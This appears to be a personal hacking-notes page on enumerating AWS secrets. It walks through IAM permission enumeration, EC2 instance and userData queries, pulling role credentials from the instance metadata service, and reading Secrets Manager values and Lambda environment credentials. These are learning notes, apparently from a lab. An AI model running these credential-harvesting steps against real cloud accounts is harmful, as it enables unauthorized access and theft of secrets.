root💀senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
Enumerating Secrets
- Enumeratepermissions of a user in AWS with enumerate_iam.py
./enumerate-iam.py --access-key AKIA --secret-key 6Zl97e
- We have access to ec2
describe_tagsanddescribe_instancespermissions which can allow instances enumeration.Note tht you have to specify the region to get more info on instances.e.g
aws ec2 describe-instances --region us-east-1 --profile <p> | jq
- I am trying to work on query usage so I used this to pick the instanceid and metadata.
aws ec2 describe-instances --region us-east-1 --profile bob --query "Reservations[*].Instances[*].[InstanceId,PublicIpAddress]" | jq
- Inspecting an ec2 instance metadata-:
According to the docs,
--attributecan date more values but userData fits our prescriptionaws ec2 describe-instance-attribute --instance-id i-* --attribute userData --region us-east-1 --profile bob | jq
- Ssh access-:
- Querying
IMDS->Every EC2 instance has access to the instance metadata service (IMDS) that contains metadata and information about that specific EC2 instance. In addition, if an IAM Role is associated with the EC2 instance, credentials for that role will be in the metadata service. Because of this, the instance metadata service is a prime target for attackers who gain access to an EC2 instance.
- First stop is to make a request to the IAM role associated with the credentials-:
#role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
#credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/*role_name*/
- Configure the new credentials like this but first IAM credentials are divided into the
Long-termandshort-termones. - Long term credentials will have an access key that starts with AKIA and will be 20 characters long. In addition to the access key there will also be a secret access key which is 40 characters long. With these two keys, you can potentially make requests against the AWS API. As the name implies, these credentials have no specified lifespan and will be useable until they are intentionally disabled/deactivated. As a result, this makes them not recommended from a security perspective. Temporary security credentials are preferred.
- Temporary credentials, by comparison, will have an access key that starts with ASIA, be 20 characters long, and also have a 40 character secret key. In addition, temporary security credentials will also have a session token (sometimes referred to as a security token). The session token will be base64 encoded and quite long. With these 3 credentials combined you can potentially make requests to the AWS API. As the name implies, these credentials have a temporary lifespan that is determined when they were created. It can be as short as 15 minutes, and as long as several hours.
- Configuring Long and temporary ones-:
# long
export AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLEEE
export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
# short
export AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLEEE
export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
export AWS_SESSION_TOKEN=EXAMPLEEXAMPLEEXAMPLE...<snip>
- Then, you should finally configure region with
aws configure --profile <p>. Note itus-east-1
- Listing lambda functions grant us another creds in env variable-:
aws lambda list-functions
- Querying Secretsmanager-:
aws secretsmanager list-secrets --profile root
- Grabbing a secret’s value with secret’s name-:
aws secretsmanager get-secret-value --secret-id "secretName"